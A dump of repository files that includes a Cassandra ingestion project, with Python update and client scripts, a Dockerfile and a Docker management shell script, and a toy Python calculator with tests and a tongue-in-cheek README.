pid/name)\")\n                        writer(closed_connections, new_connections)\n                    else:\n                        print(\"No connection update.\")\n\n                    print(flush = True)\n                else:\n                    first_iter = False\n\n                # Copying current values \n                prev_kernels = {kernel for kernel in curr_kernels}\n                prev_processes = {process for process in curr_processes}\n                prev_connections = {connection for connection in curr_connections}\n                \n                self.reload_memory()\n                exec_end_time = time.time()\n                # Adjusting sleep time based on the execution duration\n                sleep_time = time_interval - (exec_end_time-exec_start_time)\n                if sleep_time > 0:\n                    time.sleep(sleep_time)\n\n        except KeyboardInterrupt:\n            print(f\"Logging Stopped {time.strftime('%d/%m/%Y %H:%M:%S',time.localtime())}.\")\n        \n        return \n\ndef writer(missing_set: set, \n           added_set: set):\n    \"\"\"Prints removed entries prefixed with '-' and added entries prefixed with '+'.\"\"\"\n    if len(missing_set) == 0 and len(added_set) == 0:\n        return\n    \n    for deleted in missing_set:\n        print(\"-\", deleted)\n    \n    for added in added_set:\n        print(\"+\", added)\n    \n    print() \n\n" }, { "alpha_fraction": 0.5511363744735718, "alphanum_fraction": 0.5727272629737854, "avg_line_length": 15.17241382598877, "blob_id": "c73ce49296aec8a9407cca5e0e76ff291d98d18", "content_id": "9aa031785e4ce8bc5faf2b4404eaced390777dd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 880, "license_type": "no_license", 
"max_line_length": 55, "num_lines": 58, "path": "/vmwatcher/watchvm", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfunction delete_empty_files () {\n\n # Deleting empty files in dumps\n find /root/vmwatcher/dumps/ -type f -size 0 -delete\n echo \"\"\n echo \"Exiting $0\"\n exit 0\n}\n\n# To catch ctrl+c\ntrap 'delete_empty_files' INT\n\n# Default arguments\nprevent=0\nvm='one-1279'\n\n# Parsing arguments\nwhile [[ $# != 0 ]] \ndo \n case $1 in \n -p | --prevent | -prevent ) \n prevent=1\n ;;\n one*)\n vm=\"$1\"\n ;;\n *)\n echo \"invalid argument\"\n ;;\n esac\n shift \ndone\n\n# unmounting /mnt if it exists\nif [[ -f /mnt/mem ]]\nthen\n umount /mnt\nfi\n\nvmifs name $vm /mnt \n\nold_wd=$(pwd)\n\n# Redirecting stdout to stderror \ncd /root/libvmtrace/build && make 1>&2 \n\n# Run if make builds without any errors\nif [[ $? == 0 ]]\nthen\n echo \"Started monitoring.\" 1>&2\n bin/csec $vm $prevent \nelse\n echo \"Make failed.\" 1>&2\nfi\n\ncd $old_wd\n" }, { "alpha_fraction": 0.5227485299110413, "alphanum_fraction": 0.5382887125015259, "avg_line_length": 41.89959716796875, "blob_id": "d47f2788ac0e25162e152eda8aa58ada69524096", "content_id": "a5e6cbe60696e9506f5e96f55e5016a9cff80561", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10682, "license_type": "no_license", "max_line_length": 248, "num_lines": 249, "path": "/volatility3/plugins/linux/findsocket.py", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "from ctypes import addressof, pointer\nimport logging\nfrom operator import sub\nfrom typing import Generic, Iterable, List\n\nfrom volatility3.framework import exceptions, interfaces, contexts\nfrom volatility3.framework import renderers, constants\nfrom volatility3.framework.configuration import requirements\nfrom volatility3.framework.interfaces import plugins, objects\nfrom volatility3.framework.renderers import format_hints\nfrom volatility3.cli.volshell import generic\nfrom volatility3.framework.symbols import linux\nfrom volatility3.framework.objects import utility\nfrom volatility3.plugins.linux import pslist\nfrom enum import Enum\n\nimport ipaddress\n\nvollog = logging.getLogger(__name__)\n\ntry:\n import capstone\n\n has_capstone = True\nexcept ImportError:\n has_capstone = False \n\nclass FindSocket(plugins.PluginInterface):\n \"\"\"Check system call table for hooks.\"\"\"\n\n _required_framework_version = (1, 0, 0)\n _version = (1, 0, 0)\n\n @classmethod\n def get_requirements(cls) -> List[interfaces.configuration.RequirementInterface]:\n return [\n requirements.TranslationLayerRequirement(name = 'primary',\n description = 'Memory layer for the kernel',\n architectures = [\"Intel32\", \"Intel64\"]),\n requirements.PluginRequirement(name = 'pslist', plugin = pslist.PsList, version = (1, 0, 0)),\n requirements.VersionRequirement(name = 'linuxutils', component = linux.LinuxUtilities, version = (1, 0, 0)),\n requirements.SymbolTableRequirement(name = \"vmlinux\", description = \"Linux kernel symbols\")\n ]\n \n def reload_memory(self):\n \"\"\"Reloads the memory from the memory dump.\"\"\"\n\n ml = self.context.layers['memory_layer']\n ml.__init__(ml.context, ml.config_path, ml.name)\n \n pl = self.context.layers[self.config['primary']]\n pl._get_valid_table.cache_clear()\n\n @classmethod\n def get_ip4(cls, \n ip_addr: int):\n return str(ipaddress.IPv4Address(big_to_little(ip_addr, 4))) \n \n @classmethod\n def get_ip6(cls, \n ip_addr: bytes):\n return 
str(ipaddress.IPv6Address(int.from_bytes(ip_addr, \"big\")))\n    \n    @classmethod\n    def netstat(cls, \n                context: interfaces.context.ContextInterface, \n                layer_name: str, \n                symbol_table_name: str, \n                config_path: str) -> Iterable[tuple]:\n        \"\"\"Lists the network connections of the tasks in the primary layer.\n        Args:\n            context: The context to retrieve required elements (layers, symbol tables) from\n            layer_name: The name of the layer on which to operate\n            symbol_table_name: The name of the table containing the kernel symbols\n        Yields:\n            Tuples of formatted strings (pid, ppid, comm, protocol, laddr, faddr, state, path)\n        \"\"\"\n\n        vmlinux = contexts.Module(context, symbol_table_name, layer_name, 0)\n        \n        shell = generic.Volshell(context = context, config_path = config_path)\n        shell._current_layer = layer_name\n        dt = shell.display_type\n        \n        sfop = vmlinux.object_from_symbol(\"socket_file_ops\")\n        sfop_addr = sfop.vol.offset\n\n        dfop = vmlinux.object_from_symbol(\"sockfs_dentry_operations\")\n\n        dfop_addr = dfop.vol.offset\n\n        stats = []\n\n        for task in pslist.PsList.list_tasks(context, layer_name, symbol_table_name):\n            pid = task.pid\n            ppid = task.parent.pid\n            comm = utility.array_to_string(task.comm)\n\n            for _, filp, full_path in linux.LinuxUtilities.files_descriptors_for_process(context, symbol_table_name, task):\n                if filp.is_readable() and (filp.f_op == sfop_addr or filp.f_path.dentry.d_op == dfop):\n                    socket = vmlinux.object(\"socket\", offset = filp.f_inode - 48)\n                    sk = socket.sk\n                    inet_sock = vmlinux.object(\"inet_sock\", offset = sk)\n                    sk_common = sk.__getattr__(\"__sk_common\")\n                    protocol = utility.array_to_string(sk_common.skc_prot.dereference().name)\n                    ref_count = sk_common.skc_refcnt.refs.counter\n                    net_ref_count = sk_common.skc_net_refcnt \n\n                    port = big_to_little(sk_common.skc_dport, 2)\n                    sport = big_to_little(inet_sock.inet_sport, 2)\n\n                    # if '6' in protocol:\n                    if protocol[-1] == '6':\n                        ipaddr = cls.get_ip6(sk_common.skc_v6_daddr.in6_u.u6_addr8)\n                        laddr = cls.get_ip6(sk_common.skc_v6_rcv_saddr.in6_u.u6_addr8)\n                        faddr = f\"[{ipaddr}]:{str(port)}\"\n                        laddr = f\"[{laddr}]:{str(sport)}\" \n                    else:\n                        ipaddr = cls.get_ip4(sk_common.skc_daddr)\n                        laddr = cls.get_ip4(sk_common.skc_rcv_saddr)\n                        faddr = ipaddr + ':' + str(port)\n                        laddr = laddr + ':' + str(sport) \n                    \n                    if (\"TCP\" in protocol or \"UNIX\" in protocol) and TcpStates.has_value(sk_common.skc_state):\n                        state = TcpStates(sk_common.skc_state).name\n                    else:\n                        state = \"\"\n\n                    ans = (f\"{pid:<6}\", f\"{ppid:<6}\", f\"{comm:<15}\", f\"{protocol:<8}\", \n                           f\"{laddr:<25}\", f\"{faddr:<25}\", f\"{state:<15}\", f\"{full_path:<25}\")\n                    stats.append(ans)\n\n        stats.sort(key = lambda x: (x[3], int(x[4].split(':')[-1])))\n        \n        #(pid, ppid, comm, protocol, laddr, faddr, state, path)\n        for stat in stats:\n            yield stat\n\n    @classmethod\n    def netstatstr(cls, \n                   context: interfaces.context.ContextInterface, \n                   layer_name: str, \n                   symbol_table_name: str, \n                   config_path: str) -> Iterable[tuple]:\n        \"\"\"Like netstat, but yields pre-formatted column strings sorted by protocol and local port.\"\"\"\n        \n        vmlinux = contexts.Module(context, symbol_table_name, layer_name, 0)\n        \n        shell = generic.Volshell(context = context, config_path = config_path)\n        shell._current_layer = layer_name\n        dt = shell.display_type\n        \n        sfop = vmlinux.object_from_symbol(\"socket_file_ops\")\n        sfop_addr = sfop.vol.offset\n\n        dfop = vmlinux.object_from_symbol(\"sockfs_dentry_operations\")\n\n        dfop_addr = dfop.vol.offset\n\n        stats = []\n\n        for task in pslist.PsList.list_tasks(context, layer_name, symbol_table_name):\n            pid = task.pid\n            ppid = task.parent.pid\n            comm = utility.array_to_string(task.comm)\n\n            
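# A descriptor is treated as a socket when its f_op matches the kernel's\n            # socket_file_ops, resolved above from the symbol table.\n            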
for _, filp, full_path in linux.LinuxUtilities.files_descriptors_for_process(context, symbol_table_name, task):\n                if filp.is_readable() and filp.f_op == sfop_addr:\n                    socket = vmlinux.object(\"socket\", offset = filp.f_inode - 48)\n                    sk = socket.sk\n                    inet_sock = vmlinux.object(\"inet_sock\", offset = sk)\n                    sk_common = sk.__getattr__(\"__sk_common\")\n                    protocol = utility.array_to_string(sk_common.skc_prot.dereference().name)\n\n                    port = big_to_little(sk_common.skc_dport, 2)\n                    sport = big_to_little(inet_sock.inet_sport, 2)\n\n                    # if '6' in protocol:\n                    if protocol[-1] == '6':\n                        ipaddr = cls.get_ip6(sk_common.skc_v6_daddr.in6_u.u6_addr8)\n                        laddr = cls.get_ip6(sk_common.skc_v6_rcv_saddr.in6_u.u6_addr8)\n                        faddr = f\"[{ipaddr}]:{str(port)}\"\n                        laddr = f\"[{laddr}]:{str(sport)}\" \n                    else:\n                        ipaddr = cls.get_ip4(sk_common.skc_daddr)\n                        laddr = cls.get_ip4(sk_common.skc_rcv_saddr)\n                        faddr = ipaddr + ':' + str(port)\n                        laddr = laddr + ':' + str(sport) \n                    \n                    if (\"TCP\" in protocol or \"UNIX\" in protocol) and TcpStates.has_value(sk_common.skc_state):\n                        state = TcpStates(sk_common.skc_state).name\n                    else:\n                        state = \"\"\n\n                    if 'UNIX' not in protocol:\n                        ans = (f\"{pid:<6} {ppid:<6} {comm:<15}\", f\"{protocol:<8}\",f\"{laddr:<25}\", f\"{faddr:<25} {state:<15}\")\n                    else:\n                        ans = (f\"{pid:<6} {ppid:<6} {comm:<15}\", f\"{protocol:<8}\",f\"{laddr:<15}\",f\"{full_path:<15} {state:<15}\")\n                    \n                    stats.append(ans)\n                    # yield ans\n\n        # Sort by protocol and laddr port\n        stats.sort(key = lambda x: (x[1], int(x[2].split(':')[-1])))\n        \n        #(pid, ppid, comm, protocol, laddr, faddr, state, path)\n        for stat in stats:\n            yield stat\n\n    # TODO add constants for format like pid_format= \"{0:<[len]}\" for easier uniform formatting of each field\n    def _generator(self):\n        self.reload_memory()\n        headPrinted = False\n        # Printing header of non-unix protocols\n        yield 0, (f\"{'Pid':<6} {'Ppid':<6} {'Command':<15} {'Protocol':<7} {'Local Address':<25} {'Foreign Address':<25} {'State':<15}\", \"\")\n\n        for stat in self.netstatstr(self.context, self.config['primary'], self.config['vmlinux'], self.config_path):\n            if not headPrinted and 'UNIX' in \"\".join(stat):\n                # Printing header of unix protocols\n                yield 0, (f\"\\n\\n{'Pid':<6} {'Ppid':<6} {'Command':<15} {'Protocol':<8} {'Local Address':<15} {'Path':<15} {'State':<15}\", \"\")\n                headPrinted = True\n\n            yield 0, (\" \".join(stat), \"\")\n        \n    def run(self):\n        return renderers.TreeGrid([(\"Net\", str),(\"Stat\", str)], self._generator())\n        # return renderers.TreeGrid([(f\"{'Pid':<6}\", str), (f\"{'Ppid':<6}\", str), (f\"{'Command':<15}\", str), (f\"{'Protocol':<7}\", str), (f\"{'Local Address':<25}\", str), (f\"{'Foreign Address':<25}\", str), (f\"{'State':<15}\", str)], self._generator())\n\nclass TcpStates(Enum):\n    ESTABLISHED = 1\n    SYN_SENT = 2\n    SYN_RECEIVED = 3\n    FIN_WAIT_1 = 4\n    FIN_WAIT_2 = 5\n    TIME_WAIT = 6\n    CLOSE = 7\n    CLOSE_WAIT = 8\n    LAST_ACK = 9\n    LISTENING = 10\n    CLOSING = 11\n    MAX_STATES = 12\n\n    @classmethod\n    def has_value(cls, value):\n        return value in cls._value2member_map_\n\n# Converts a big-endian value to little-endian byte order\ndef big_to_little(num, size):\n    return int.from_bytes(num.to_bytes(size, \"big\"), \"little\")\n" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.6282051205635071, "avg_line_length": 11.833333015441895, "blob_id": "c889e4acd2fde03743f7a4d88440074d9c74f7db", "content_id": "1421b0e7bf3b9215cedd1241d17790a0e1d0e85b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 78, "license_type": "no_license", 
"max_line_length": 38, "num_lines": 6, "path": "/scripts/run_syscall.sh", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ngcc /root/sim_syscall_175.c -o syscall\n\n#echo $1\n./syscall \"$1\" \n" }, { "alpha_fraction": 0.5378151535987854, "alphanum_fraction": 0.5658263564109802, "avg_line_length": 21.3125, "blob_id": "04f31d9797a0197209bdfd2ed3f7cad623040e00", "content_id": "5c925bde05a071f086d1ed971dbd879be93068aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 357, "license_type": "no_license", "max_line_length": 68, "num_lines": 16, "path": "/scripts/sim_syscall_175.c", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#include <unistd.h>\n#include <stdio.h>\n\nint main(int argc, char *argv[])\n{\n unsigned long syscall_nr = 175;\n char *data = argv[1];\n int i = 0;\n while(data[i] != '\\0'){\n\t++i;\n }\n \n printf(\"The data is %s, size = %d\\n\", data, i); \n syscall(syscall_nr, (void*) data, i, \"test=1\");\n printf(\"The data after syscall 175, is %s, size = %d\\n\", data, i);\n}\n" } ]
13
ealbin/cassandra
https://github.com/ealbin/cassandra
f94725c847a5941a1dde34b9bc6905b80cdb0e9b
3f524d39bb40f33ae72cdf00d5f7ab72a7266968
5acfd37e2250ccc8d4faaf9dfb42ab6e6c4c3e81
refs/heads/master
2021-09-12T21:14:10.440603
2018-04-20T22:01:43
2018-04-20T22:01:43
119,069,696
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.555816113948822, "alphanum_fraction": 0.5787992477416992, "avg_line_length": 29.457143783569336, "blob_id": "5dd774cfed7abc61ef86d37b2d094ce063ee08d1", "content_id": "2a4a0401bb78f5017d83966c5c2f2403f1f5fcc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2132, "license_type": "no_license", "max_line_length": 189, "num_lines": 70, "path": "/src/update.py", "repo_name": "ealbin/cassandra", "src_encoding": "UTF-8", "text": "#!/bin/env python\n\n# updates cassandra with current data\n# keeps track of data that's been processed in the `ingested` directory\n\nimport ingest\nimport os\nimport sys\nimport time\n\ndata_dir = '/data/daq.crayfis.io/raw/'\ningested_dir = './ingested'\n\nprint '>> starting...'\nsys.stdout.flush()\n\ntarfiles = []\nfor path, directories, files in os.walk( data_dir ):\n if '_old/' in path: continue\n\n for filename in files:\n if filename.endswith('.tar.gz'):\n tarfiles.append( os.path.join(path,filename) )\ntarfiles = sorted( tarfiles, key=lambda k: k.lower(), reverse=True ) # most recent first\n\nprint '>> found {0} tarfiles in {1}'.format( len(tarfiles), data_dir )\n\ntarget = 0.\nn = float(len(tarfiles))\nelapsed = 0.\nabsolute_start = time.time()\nn_skipped = 0.\nn_completed = 0.\nfor i, file in enumerate(tarfiles):\n\n # Don't repeat what's done already\n if os.path.isfile( os.path.join( ingested_dir, file.replace('/','_') ) ):\n print ' skipping {0}, already ingested'.format(file)\n n_skipped += 1.\n continue\n\n start = time.time() \n did_it_work = ingest.from_tarfile(file)\n\n if did_it_work == True:\n elapsed += time.time() - start\n open( os.path.join( ingested_dir, file.replace('/','_') ), 'a' ).close()\n n_completed += 1.\n else:\n print '\\nfail: {0}'.format(file)\n n_skipped += 1.\n continue\n\n# if (n_completed > 0) and ( (i+1.)/n > (target/100.) or n_completed < 48 ):\n total_minutes = ( time.time() - absolute_start ) / 60.\n rate = n_completed / elapsed # files / second\n hours_remaining = (n - n_skipped - n_completed) / rate / 3600.\n print '\\r>> working... 
{0}%, current file: {1}, ave time/file: {2:.3} s, elapsed time: {3:.3} m, eta: {4:.5} hrs '.format( target, file, 1./rate, total_minutes, hours_remaining),\n    sys.stdout.flush()\n    if (i+1.)/n > (target/100.):\n        if target < 1:\n            target += .1\n        elif target < 10:\n            target += 1.\n        elif target < 90:\n            target += 5.\n        elif target < 99:\n            target += 1.\n        else:\n            target += .1\n" }, { "alpha_fraction": 0.5575364828109741, "alphanum_fraction": 0.5591571927070618, "avg_line_length": 19.566667556762695, "blob_id": "1fd43f011af45c811304a8a914709b62a4e0022f", "content_id": "80641840a3874de0822ff3a22420bc0ea61b46a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 617, "license_type": "no_license", "max_line_length": 52, "num_lines": 30, "path": "/Dockerfile", "repo_name": "ealbin/cassandra", "src_encoding": "UTF-8", "text": "# Not necessary if working from craydata\n\nFROM ubuntu:xenial\n\n# core software\n#---------------------------------------------------\nRUN apt-get update && apt-get install -y \\\n    build-essential \\\n    python \\\n    python-dev \\\n    python-pip \\\n    python-gdal \\\n    python-matplotlib \\\n    python-numpy \\\n    python-scipy \\\n    git \\\n    openssh-client \\\n    python3-pip \\\n    ipython \\\n    nano\n    \nRUN pip install --upgrade pip\nRUN pip install cassandra-driver\nRUN pip install protobuf\nRUN pip install docker\n\n\n# set up working directory\n#---------------------------------------------------\nWORKDIR /home/craydata\n" }, { "alpha_fraction": 0.7006109952926636, "alphanum_fraction": 0.705091655254364, "avg_line_length": 32.16216278076172, "blob_id": "cd22fba96e80b771387bf338c96990b194db41d0", "content_id": "4f96cbf8acfddf0ba35a01895c23238f855dccb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2455, "license_type": "no_license", "max_line_length": 144, "num_lines": 74, "path": "/jumpstart.py", "repo_name": "ealbin/cassandra", "src_encoding": "UTF-8", "text": "#!/bin/env python\n\n# an example of accessing Cassandra from python\n# you can run this file e.g. python jumpstart.py\n# check out the TL;DR at the bottom..\n#-----------------------------------------------\n\n# (1) get the IP address of the Cassandra server\n# ref: https://docker-py.readthedocs.io/en/stable/\nimport docker\nclient = docker.from_env()\n# below will error if the container is not already running\n# kick it off as needed: bash /home/crayfis-data/cassandra/bin/cmd.sh\nserver = client.containers.get('crayvault')\nipaddr = server.attrs['NetworkSettings']['IPAddress']\n\n\n# (2) connect with the Cassandra server\n# ref: https://datastax.github.io/python-driver/index.html\nfrom cassandra.cluster import Cluster\ncluster = Cluster([ipaddr])\nsession = cluster.connect()\n#help(session) # to wit: default_timeout and row_factory\n\n\n# (3) explore the current keyspaces and tables\n# ref: https://datastax.github.io/python-driver/api/cassandra/metadata.html\nmeta = cluster.metadata\nkeyspaces = meta.keyspaces\n# raw: where raw data goes, right now that's the only data keyspace\n# system_xxxx: cluster info\nraw = keyspaces['raw']\ntables = raw.tables\n# etc, e.g.\nevents = raw.tables['events']\ncolumns = events.columns\n#columns.keys()\n# etc..\n\n\n# (4) submit CQL searches to the database\n# ref: https://docs.datastax.com/en/cql/3.1/cql/cql_reference/cqlCommandsTOC.html\n# e.g. 
get all events and all info \nresults = session.execute( 'select * from raw.events' )\n#while results.has_more_pages:\n# for event in results.current_rows:\n# pass # process your data\n# results.fetch_next_page()\n\n# e.g. get only device_id and pixels\nresults = session.execute( 'select device_id, pixels from raw.events' )\n\n\n# (5) disconnect from the server\ncluster.shutdown()\n\n\n# TL;DR / Boiler-plate\n#-------------------------------------------------\nimport docker\nipaddr = docker.from_env().containers.get('crayvault').attrs['NetworkSettings']['IPAddress']\nfrom cassandra.cluster import Cluster\ncluster = Cluster([ipaddr])\nsession = cluster.connect()\n#...\nmeta = cluster.metadata\nprint 'keyspaces: {0}'.format(meta.keyspaces.keys())\nprint 'raw tables: {0}'.format(meta.keyspaces['raw'].tables.keys())\nprint\nprint 'raw.events columns: {0}'.format(session.execute('select * from raw.events').column_names)\nprint\nprint 'device_ids in events: {0}'.format([ row.device_id for row in session.execute('select distinct device_id from raw.events').current_rows ])\n#...\ncluster.shutdown()\n\n" }, { "alpha_fraction": 0.5357390642166138, "alphanum_fraction": 0.5419847369194031, "avg_line_length": 30.100719451904297, "blob_id": "7b2cd56b2a3a187c772e5a5b45192b532d38a0d3", "content_id": "dc501de9615680a4858cdc9783900122a2904ac9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4323, "license_type": "no_license", "max_line_length": 159, "num_lines": 139, "path": "/bin/cmd.sh", "repo_name": "ealbin/cassandra", "src_encoding": "UTF-8", "text": "#!/bin/env bash\n\n# Variables\nCASSANDRA_IMAGE=\"cassandra:latest\"\nCLUSTER_NAME=\"crayvault\"\nHOST_CASSANDRA_DIR=\"/data/cassandra\"\nHOST_IMAGE=\"ubuntu:daq\"\nHOST_NAME=\"craydata\"\nHOST_DATA=\"/data/daq.crayfis.io/raw\"\nHOST_SRC=\"$PWD/src\"\n\nupdate() {\n check=`docker ps | egrep -c \"${HOST_NAME}\"`\n if [ $check -gt 0 ]; then docker kill ${HOST_NAME}; docker rm ${HOST_NAME}; fi\n cmd=\"docker build -t ${HOST_IMAGE} .\"\n echo\n echo $cmd\n eval $cmd\n exit_code=$?\n echo\n if [[ $exit_code != 0 ]]; then break; fi\n data_map=\"${HOST_DATA}:/data/daq.crayfis.io/raw\"\n src_map=\"${HOST_SRC}:/home/${HOST_NAME}/src\"\n ingested_map=\"${HOST_SRC}/ingested\"\n cmd=\"docker run --rm --name ${HOST_NAME} -v ${data_map} -v ${src_map} -v ${ingested_map} --link ${CLUSTER_NAME}:cassandra -dt ${HOST_IMAGE}\"\n echo $cmd\n eval $cmd\n echo\n cmd=\"docker exec ${HOST_NAME} python /home/${HOST_NAME}/src/update.py\"\n echo $cmd\n eval $cmd\n echo\n docker kill ${HOST_NAME}\n}\n\nif [ $# -eq 1 ]; then\n if [ \"$1\" = \"update\" ]; then\n update\n else\n echo 'invalid option'\n exit\n fi\nfi\n\nprompt[0]=\"Boot up ${CASSANDRA_IMAGE}\"\nprompt[1]=\"Build and Boot ${HOST_IMAGE} (debug)\"\nprompt[2]=\"Update Cassandra with latest data\"\nprompt[3]=\"csql> ${CLUSTER_NAME}\"\nprompt[4]=\"bash ${CLUSTER_NAME}\"\nprompt[5]=\"kill all\"\nprompt[6]=\"Cleanup docker images\"\nprompt[7]=\"Make environment\"\n\nPS3=\"Select Command: \"\nselect opt in \"${prompt[@]}\"\ndo\n case $opt in ${prompt[0]}) # boot up cassandra image\n check=`docker ps | egrep -c \"${CLUSTER_NAME}\"`\n if [ $check -gt 0 ]; then echo \"instance of ${CLUSTER_NAME} already running...\"; break; fi\n eval \"docker rm ${CLUSTER_NAME}\"\n\t cmd=\"docker run --rm --name ${CLUSTER_NAME} -v $PWD/config/cassandra:/etc/cassandra -v ${HOST_CASSANDRA_DIR}:/var/lib/cassandra -d ${CASSANDRA_IMAGE}\"\n\t echo\n\t echo $cmd\n\t eval $cmd\n echo\n\t break\n 
;;\n\n ${prompt[1]}) # build and boot host image for debug\n check=`docker ps | egrep -c \"${HOST_NAME}\"`\n if [ $check -gt 0 ]; then docker kill ${HOST_NAME}; docker rm ${HOST_NAME}; fi\n\t cmd=\"docker build -t ${HOST_IMAGE} .\"\n\t echo\n\t echo $cmd\n\t eval $cmd\n\t exit_code=$?\n\t echo\n if [[ $exit_code != 0 ]]; then break; fi\n data_map=\"${HOST_DATA}:/data/daq.crayfis.io/raw\"\n src_map=\"${HOST_SRC}:/home/${HOST_NAME}/src\"\n ingested_map=\"${HOST_SRC}/ingested\"\n\t cmd=\"docker run --rm --name ${HOST_NAME} -v ${data_map} -v ${src_map} -v ${ingested_map} --link ${CLUSTER_NAME}:cassandra -it ${HOST_IMAGE}\"\n\t echo $cmd\n eval $cmd\n\t echo\n\t break\n ;;\n\n ${prompt[2]}) # update cassandra with latest data\n update\n\t break\n ;;\n\n ${prompt[3]}) # csql cassandra\n\t cmd=\"docker run -it --link ${CLUSTER_NAME}:cassandra --rm cassandra cqlsh cassandra\"\n\t echo\n\t echo $cmd\n\t eval $cmd\n\t echo\n\t break\n\t ;;\n\n ${prompt[4]}) # bash cassandra\n\t cmd=\"docker run -it -v $PWD:/home -v $PWD/config/cassandra:/etc/cassandra --link ${CLUSTER_NAME}:cassandra --rm cassandra bash\"\n\t echo\n\t echo $cmd\n\t eval $cmd\n\t echo\n break\n ;;\n\n ${prompt[5]}) # kill all\n check=`docker ps | egrep -c \"${CLUSTER_NAME}\"`\n if [ $check -gt 0 ]; then docker kill $CLUSTER_NAME; fi\n\n check=`docker ps | egrep -c \"${HOST_NAME}\"`\n if [ $check -gt 0 ]; then docker kill $HOST_NAME; fi\n break\n ;;\n\n\t ${prompt[6]}) # cleanup docker images\n \t for id in `docker images | egrep \"^<none>\" | awk '{print $3}'`; do docker rmi $id; done\n \t break\n \t ;;\n\n ${prompt[7]}) # make environment\n export CASSANDRA_IMAGE=$CASSANDRA_IMAGE\n export CLUSTER_NAME=$CLUSTER_NAME\n export HOST_CASSANDRA_DIR=$HOST_CASSANDRA_DIR\n export HOST_IMAGE=$HOST_IMAGE\n export HOST_NAME=$HOST_NAME\n export HOST_DATA=$HOST_DATA\n export HOST_SRC=$HOST_SRC\n break\n ;;\n\n *) echo invalid option;;\n esac\ndone\n" } ]
4
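The `jumpstart.py` file in the record above leaves its result-paging loop commented out. As a minimal sketch (assuming the same `session` object and `raw.events` table from that file, with a placeholder contact point instead of the docker IP lookup), the commented loop could be enabled like this:

```python
from cassandra.cluster import Cluster

# Placeholder contact point -- jumpstart.py resolves the real address via the docker API.
cluster = Cluster(['127.0.0.1'])
session = cluster.connect()
session.default_fetch_size = 500  # rows per page; the driver default is 5000

results = session.execute('select device_id, pixels from raw.events')
while True:
    for event in results.current_rows:
        pass  # process one page of rows here
    if not results.has_more_pages:
        break
    results.fetch_next_page()  # synchronously fetch the next page

cluster.shutdown()
```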
EugeneOnTheEdge/advanced-calculator
https://github.com/EugeneOnTheEdge/advanced-calculator
349977d82588e91c985fd46ae3d853266111507a
7fa950108d8023751be9c26e96b0aadee19407ac
915ec68f8c2c3f1c50d67d1863795406ed604ac0
refs/heads/master
2022-12-15T23:31:06.250897
2020-09-22T01:33:16
2020-09-22T01:33:16
296,707,664
0
0
null
2020-09-18T19:04:29
2020-09-22T01:15:18
2020-09-22T01:33:17
Python
[ { "alpha_fraction": 0.7948718070983887, "alphanum_fraction": 0.8041958212852478, "avg_line_length": 32, "blob_id": "eddda2927f7af70f13a77947935c47b42bf24944", "content_id": "66d67c26a8a385ef2c8e90a7d42d2cbede7d1a49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 429, "license_type": "no_license", "max_line_length": 168, "num_lines": 13, "path": "/README.md", "repo_name": "EugeneOnTheEdge/advanced-calculator", "src_encoding": "UTF-8", "text": "# Advanced Calculator\nThis is what's next in the era of calculators. Advanced Calculator utilizes quantum computing techniques to bring your math-calculating experience to a whole new level.\n\nThere are four branches including Master:\n\n# Master\nIncludes the prompt to ask a user for two numbers\n\n# Division\nIncludes a function to divide the two input numbers\n\n# Exponent\nCall exponent by exponent(num1, num2) to recieve num1^num2\n" }, { "alpha_fraction": 0.6524520516395569, "alphanum_fraction": 0.673774003982544, "avg_line_length": 30.266666412353516, "blob_id": "07425434909b9bf1d32a39055ce15dfd5a9fece2", "content_id": "cf75a30bcf0bc04b8122f674f8dc1670c41a1add", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 469, "license_type": "no_license", "max_line_length": 93, "num_lines": 15, "path": "/tests.py", "repo_name": "EugeneOnTheEdge/advanced-calculator", "src_encoding": "UTF-8", "text": "import unittest, calculator\n\n\nclass MyTestCase(unittest.TestCase):\n def test_exp(self):\n self.assertEqual(calculator.exponent(2,2), 4) # test case for exponent feature\n\n def test_divide(self):\n self.assertEqual(calculator.divide(2,2), 1) # test case for divide feature\n\n def test_multiply(self):\n self.assertEqual(calculator.multiply(7,8), 56) # test case for multiplication feature\n \nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.4859241247177124, "alphanum_fraction": 0.5348837375640869, "avg_line_length": 34.5217399597168, "blob_id": "c0d8a05b584ae3609e3e9c5158c2a7ea1a234f4d", "content_id": "3d2ec5a1450893c28dc34fc8fc4773a27b9dab2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 817, "license_type": "no_license", "max_line_length": 100, "num_lines": 23, "path": "/calculator.py", "repo_name": "EugeneOnTheEdge/advanced-calculator", "src_encoding": "UTF-8", "text": "def exponent(num1, num2):\n return int(num1)**int(num2) #returns num1^num2\n\ndef multiply(num1, num2):\n return sum([num1 for i in range(num2)])\n\ndef divide(num1, num2):\n answer = int(num1) * 1.0 / int(num2) #returns num1 / num2\n return answer\n\nif __name__ == \"__main__\":\n n1 = int(input(\"Enter the first number: \"))\n n2 = int(input(\"Enter the second number: \"))\n mode = input(\"Enter 1 to multiply / 2 to divide / 3 to use num1 exponent num2 / else to exit: \")\n\n if mode == \"1\":\n print(str(n1) + \" * \" + str(n2) + \" is \" + str(multiply(n1,n2)) + \".\")\n elif mode == \"2\":\n print(str(n1) + \" / \" + str(n2) + \" is \" + str(divide(n1,n2)) + \".\")\n elif mode == \"3\":\n print(str(n1) + 